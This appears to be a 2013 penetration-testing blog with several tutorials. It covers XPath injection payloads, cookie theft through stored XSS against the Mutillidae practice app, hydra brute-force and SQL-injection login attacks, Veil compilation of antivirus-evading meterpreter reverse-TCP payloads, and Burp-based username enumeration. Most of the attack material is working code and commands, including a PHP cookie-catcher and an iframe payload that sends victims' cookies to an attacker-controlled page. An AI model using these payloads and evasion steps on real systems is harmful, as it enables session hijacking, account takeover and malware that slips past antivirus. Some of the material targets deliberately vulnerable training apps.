This is default featured slide 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Friday, November 29, 2013

XPATH Injection Tutorial

XPath is a language that has been designed and developed to operate on data that is described with XML. The XPath injection allows an attacker to inject XPath elements in a query that uses this language. Some of the possible goals are to bypass authentication or access information in an unauthorized manner.

We are gonna learn using simple example. Download code from here & put it in your local server directory.(Code is created by Amol Naik )

Sample XML Document which we gonna use:-

<!-- Employees Database -->
  <Employee ID="1">
  <Employee ID="2">
  <Employee ID="3">
  <Employee ID="4">

Bypass Authentication:-

Browse to the login.php page; here we can see simple login form.

Bypass Authentication

If the application does not properly filter such input, the tester will be able to inject XPath code and interfere with the query result. For instance, the tester could input the following values:

Username: ' or '1' = '1
Password:  ' or '1' = '1

Bypass Authentication using XPATH injection
Looks quite familiar, doesn't it? Using these parameters, the query becomes:

string(//Employee[uname/text()='' or '1' = '1' and passwd/text()='' or '1' = '1']/account/text())

As in a common SQL Injection attack, we have created a query that is always evaluated as true, which means that the application will authenticate the user even if a username or a password have not been provided.

Blind Xpath Injection:-

If there is no knowledge about the XML data internal details and if the application does not provide useful error messages that help us reconstruct its internal logic, it is possible to perform a Blind XPath Injection attack whose goal is to reconstruct the whole data structure.

Browse to the search.php page. Enter any number, When you provide number it will display FirstName related to their ID.

Blind XPATH Injection
Enter ' or '1' = '1 in search , & you will get all FirstName regardless of any ID(Number).

Blind XPATH Injection
In blind Xpath injection we have to provide special crafted query to application, if query is true we will get result otherwise we will not get any result.Till now We don`t know about any parent or child node of XML document.

Guessing of parent node:-

Supply following query to application & observe result.

' or substring(name(parent::*[position()=1]),1,1)='a

Nothing append , we don`t get FirstName of users.It means first letter of parent node is not "a". Now supply following query

' or substring(name(parent::*[position()=1]),1,1)='E

Blind XPATH Injection
You get result , It means first letter of parent node is "E"

To guess second letter of parent node supply following query

' or substring(name(parent::*[position()=1]),2,1)='m

Following the same procedure, we can extract the full name of the parent node, which was found to be 'Employee'.

We can also get child node. Browse to the xpath.php page & enter following query.


You got output from parent node Employee id 3 & child node whose position is 2.

To get whole document put following query.


Blind Xpath injection
It`s just concept how to retrieve data from XML document using XPATH injection.XPath contains two useful functions that can help you automate the preceding attack and quickly iterate through all nodes and data in the XML document:

  • count() returns the number of child nodes of a given element, which can be used to determine the range of position() values to iterate over.
  •  string-length() returns the length of a supplied string, which can be used to determine the range of substring() values to iterate over.
I used recon-ng xpath bruteforcer for xpath injection attack & we will get back end XML file.


Useful Links & Blind XPATH injection Tools:-



Wednesday, November 20, 2013

Broken Authentication & Session Management in Mutillidae

Broken Authentication and Session Management is on number 2 in OWASP Top 10 vulnerability list 2013. In mutillidae , it contain three subsection.

  • Authentication Bypass
  • Privilege Escalation
  • Username Enumeration

We have already covered Username enumeration in last article & we got valid username list which exist in database. Today we are going to use authentication bypass method.

  1. Using cookie
  2. Using brute-force
  3. Using SQL injection

(1)Authentication Bypass using cookie:- 

As we know that , mutillidae is vulnerable to XSS, so we can capture cookie with help of XSS. We are going to take advantage of persistent XSS.

Above link is vulnerable to persistent XSS attack. We can submit html to add blog we are going to use cookie-catcher.

Content of cookie_catcher.php :-

header ("Location:");
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");;
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');

Upload your cookie_catcher.php to server. For demo i used my local apache server & after execution of script it will redirect to can change the code according to your need. It will grab IP, cookie, Referer, time & date.

Now as anonymous user , we will add blog entry.I used other OS on my virtual box for attack.


(2)Submit following html to blog

<b> nirav k desai</b>
<u>help me</u>
<iframe frameboarder=0 height=0 width=0 src=javascript:void(document.location=""+document.cookie) </iframe >


Replace Link to your uploaded cookie_catcher.php

(3)Now when "admin" or any "logged user" show your added blog entry , you will get his cookie, i.p., date & time.


(4)To view cookie open cookie.html.

(5)Now you can use any cookie manager add-on to edit cookie; replace cookie which we got.


(6)After reload we got admin access to web-application.


(2)Authentication Bypass Using bruteforce:- 

You can use hydra or burpe intruder to bruteforce login form of application.

hydra -l admin -P /root/pass.txt http-post-form "/mutillidae/index.php?page=login.php:username=^USER^&password=^PASS^&login-php-submit-button=Login:Not Logged In"


(3)Authentication Bypass Using sql injection:- 

We can inject special database characters or SQL timing attacks into page parameters. We are going to use login page; and inject sql character to  login form.

You can use SQL injection cheat sheet & we will brute-force  using SQL statements.Save it to file.

hydra -l admin -P /root/sql http-post-form "/mutillidae/index.php?page=login.php:username=^USER^&password=^PASS^&login-php-submit-button=Login:Not Logged In"


And we got for valid SQL statements ; with help of it we can bypass admin panel.

Saturday, November 16, 2013

How to solve compile error in veil?

As you know, veil is AV evasion framework for metasploit payload. On the 15th of every month, for the next year, at least one new payload module will be released.Yesterday they released two new payload.

  1. pure windows/meterpreter/reverse_tcp stager, no shellcode
  2. pure windows/meterpreter/reverse_tcp windows service stager compatible with psexec, no shellcode

Compiler Error in c payloads:-

 Available c payloads:

    VirtualAlloc                         Poor
    VoidPointer                         Poor
    meter_rev_tcp                     Excellent
    meter_rev_tcp_service        Excellent


I used c/meter_rev_tcp. After setting of LHOST & LPORT ; when i try to generate it ; i got error.

sh: i686-w64-mingw32-gcc: command not found


Okay now we successfully generated payload file, but we get compiler error while compiling into cross-platform exe.

Error clearly suggest that i686-w64-mingw32-gcc is not installed.The mingw-w64 project is a complete run-time environment for gcc to support binaries native to Windows 64-bit and 32-bit operating systems.In short, to compile the payload for 64 bit windows ; we have to install mingw-w64. 

In case of 32 bit windows os , we can compile it,because when you setup veil environment mingw32 installed using wine.

Compile payload for 32 bit:-

root@bt:~# cd .wine/drive_c/MinGW/bin/

root@bt:~/.wine/drive_c/MinGW/bin# wine mingw32-gcc.exe /root/veil-output/source/output.c -lwsock32  -o output.exe


So our payload is compiled into exe for 32 bit windows.

Compile payload for 64 bit:-

For this purpose you have to install mingw32-w64.

Download from here & build it.If you don`t want to install it; then you can use pre-compiled version.

root@bt:/media/tools/mingw-w64-bin_i686-linux_20111031_sezero/cross_win64/bin# ./x86_64-w64-mingw32-gcc /root/veil-output/source/output.c -lwsock32 -o output.exe

I don`t test compiled exe  in 64 bit, so if anyone use it, please let me know exe is working or not.

If you want to build MinGW-w64 for Win32 and Win64 using automated bash script, click here.

Compiler error in C#:-

Available c# payloads:

    VirtualAlloc                   Poor
    b64SubVirtualAlloc       Normal


root@bt:~/Downloads/Veil-master# ./ -l c# -p b64SubVirtualAlloc --msfpayload windows/meterpreter/reverse_tcp -o payload --msfoptions LHOST= LPORT=443

Our source file has been generated and got following error.
error CS2007: Unrecognized command-line option: `-platform:x86'

error CS2007

gmcs /root/veil-output/source/payload.cs 

error CS2007

Now our exe is generated,it`s in same source folder.

Sunday, November 10, 2013

Username Enumeration in Mutillidae using Burpe Intruder.

Mutillidae  is a free, open source, vulnerable web-application providing a target for web-security tester. Mutillidae can be installed on Linux and Windows using LAMP, WAMP, and XAMMP.

Username Enumeration :- We have an application that will reveal to us when a username exists on the system which can be used in further step like brute-force account.

In Mutilliade login page , when you provide valid username & invalid password , web-application reply us that password incorrect.

Username Enumeration

When we provide invalid username ; then application tell us that Account does not exist.

Username Enumeration Mutillidae

So by monitoring web-application message one can know that username is valid or not.

First we will examine source code of page ; when we provide valid username reply is "var lAuthenticationAttemptResultFlag = 1" & when we provide invalid username reply is "var lAuthenticationAttemptResultFlag = 0"

var lAuthenticationAttemptResultFlag = 1    It means username exist.

var lAuthenticationAttemptResultFlag = 0    It means username does not exist.

Alternatively we can do this by saving both page (valid username & invaild username) source code in text file & then use diff command.

root@bt:~# diff login password
< var lAuthenticationAttemptResultFlag = 0;
> var lAuthenticationAttemptResultFlag = 1;

Now Open burpe suite, setup listener ; try to sign in from browser & capture request.


Now right click on request & click on send  to inrtuder.

For position we choose only username.


On payload tab  ---) payload option  ----) load sample username list.


In option tab      ---)    Grep match     ---) Add
var lAuthenticationAttemptResultFlag = 1; var lAuthenticationAttemptResultFlag = 0;


Click on intruder ---) start Attack

Now Burpe make request to login page & examine request & classified responce according to option which we provided.


Click on save , result table & Delimiter click on custom & put ";" ,then select column which we need , in this case i select payload,var lAuthenticationAttemptResultFlag = 1,var lAuthenticationAttemptResultFlag = 0 and then save it.


Saved file is look like following format.


In file first is username ; then true means username exist , false menas username is invalid. So now we only need entry which second column is true.


So i saved this value in another temp file from where you can extract username from file using delimiter. I used simple python script for this purpose.

Username List
Finally we got list of username which exist on system.